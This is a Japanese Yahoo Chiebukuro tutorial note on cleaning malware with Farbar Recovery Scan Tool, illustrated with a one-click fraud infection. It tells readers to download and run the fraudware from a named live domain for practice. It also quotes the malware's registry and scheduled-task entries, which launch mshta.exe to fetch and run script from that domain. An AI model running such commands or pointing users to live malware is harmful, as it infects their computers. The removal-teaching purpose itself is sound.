この知恵ノートを「知恵コレクション」に追加しました。
追加した知恵ノートはMy知恵袋の「知恵コレクション」ページで確認できます。
「知恵コレクション」に登録済みです。
再登録しました。
追加に失敗しました。
ノートに戻り、もう一度やり直してください。
すでに1,000件のノートが登録されています。
新しく追加したい場合は、My知恵袋の「知恵コレクション」ページで登録されているノートを削除してください。
追加できませんでした。
ノートは削除されました。
知恵コレに追加する:0人
Farbar recovery scan tool使い方
ライター:kuzu_88888888888さん(最終更新日時:2015/3/25)投稿日:2015/3/25 アドバイス受付中!
- ナイス!:
0
- 閲覧数:6
● Farbar recovery scan tool使い方
http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
OSが32 bitなのか、64bitなのか、是非確認し、適切な方をダウンロードしてほしい。
*
http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
(チュートリアル)
?事前の準備として
デスクトップ上に新しいフォルダを作成して欲しい。フォルダ名は「FRST」などなど(なんでもよい)。
そのフォルダの中に、Farbar recovery scan toolをダウンロードしておいてほしい。それから起動させる。update時間
があるので、ちょっと待機。
[Scan] これをクリックするとscanが始まる。
程なくして、「FRST.txt-メモ帳」が吐出されてくる=logである。また同時に「Addition.txt」も吐出されてくるので
(log)これも、重要なlogとして熟読すること。
a) 「FRST.txt」と
B) 「Addition.txt」
この2つのlogから、Fixスクリプトを作成するというわけ。
?実際の使い方
まずトレーニングをしてみよう。実際に使ってみないことには、チュートリアルなど100回読んでも理解できないから
だ。こんなときは「ワンクリウエア」で実験するのが、一番理解しやすい。そこで
sakura317.pw/
↑
ワンクリウエアをダウンロードしてほしい。で、デスクトップ上に保存し、それから実行へ。
? FRSTを起動させ、Scanをしてみよう
そしてlogの結果は?
HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [SystemBoot7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]
=> mshta.exe htp://sakura317.pw/pcsz922/reg2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT&log=1
HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT] =>
mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\RunOnce: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]
=> mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
Task: {A44F204A-32DC-4728-BFAC-52C3EC63807E} - System32\Tasks\RegWrite => mshta.exe htp://sakura317
●/...MF5IBvTJjZKtLgT
Task: {B2D65560-A336-4130-A2D9-282DACC677E7} - System32\Tasks\SystemBoot => mshta.exe htp://sakura317
●/...MF5IBvTJjZKtLgT
FRST.txtと、Addition.txtの両方を吟味し、自動実行のエントリが作成されている点と、タスクスケジューラが生成登録
されていることが分かったネ。
? Fixスクリプトの作成を
---------------------------------(破線以下がFixスクリプトである)
Start
Closeprocesses:
Emptytemp:
HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [SystemBoot7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]
=> mshta.exe htp://sakura317.pw/pcsz922/reg2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT&log=1
HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT] =>
mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\RunOnce: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]
=> mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
Task: {A44F204A-32DC-4728-BFAC-52C3EC63807E} - System32\Tasks\RegWrite => mshta.exe
htt://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
Task: {B2D65560-A336-4130-A2D9-282DACC677E7} - System32\Tasks\SystemBoot => mshta.exe
htp://sakura317.pw/pcsz922/reg2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
End
------------------------------------
ここで重要な手続きがある。
まず、Fixスクリプトの名前は必ず「fixlist.txt」としてほしい。違う名をつけると起動しない可能性がある。
かつ、必須はこのfixlist.txtを、デスクトップ上に作成しておいた「FRST」のフォルダの中に収容してほしいという点
。FRST.exeが格納されている「同一フォルダ」に、fixlist.txtも格納しないと、FIXできないのだ。
OTL by Old Timerの場合は、Fixスクリプト作成後「セーフモード下」にてFixするのが一般的であり(通常modeの場合は
、フリーズする確率が極めて高くFixに失敗する)成功率も高いけれど、この
TRSTは「通常mode」でもFixできるので、非常に使いやすいし価値が高い。また、scan速度も速いし、Fixに要する時間も
短いという特徴があるんだな。
Fixに成功したら、PCを再起動させてほしい。再起動後、処理をした結果logが提示されることになる。
以下、今回のFixの結果logである
↓
*****************
Processes closed successfully.
HKU\S-1-5-21-254916690-2023439207-755044999-1000
\Software\Microsoft\Windows\CurrentVersion\Run\\SystemBoot7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT => value
deleted successfully.
HKU\S-1-5-21-254916690-2023439207-755044999-1000
\Software\Microsoft\Windows\CurrentVersion\Run\\RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT => value
deleted successfully.
HKU\S-1-5-21-254916690-2023439207-755044999-1000
\Software\Microsoft\Windows\CurrentVersion\RunOnce\\RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT => value
deleted successfully.
C:\Windows\System32\Tasks\RegWrite => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RegWrite" => Key Deleted
successfully.
C:\Windows\System32\Tasks\SystemBoot => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemBoot" => Key Deleted
successfully.
EmptyTemp: => Removed 2 MB temporary data.
The system needed a reboot.
==== End of Fixlog 05:47:04 ====
アドバイス(このノートのライターへのメッセージ)を送る
このノートはどうでしたか? いいと思ったことや、こうしたらもっとよくなるといったメッセージを送りましょう! ノートの内容やライターについて質問がある場合は、Q&Aから質問してみましょう
アドバイスを送るには、
Yahoo! JAPAN IDでのログインおよび
Yahoo!知恵袋の利用登録が必要です。
感想アドバイス履歴
-
現在アドバイスはありません
このノートに関するQ&A
このノートに関するQ&Aは、まだありません。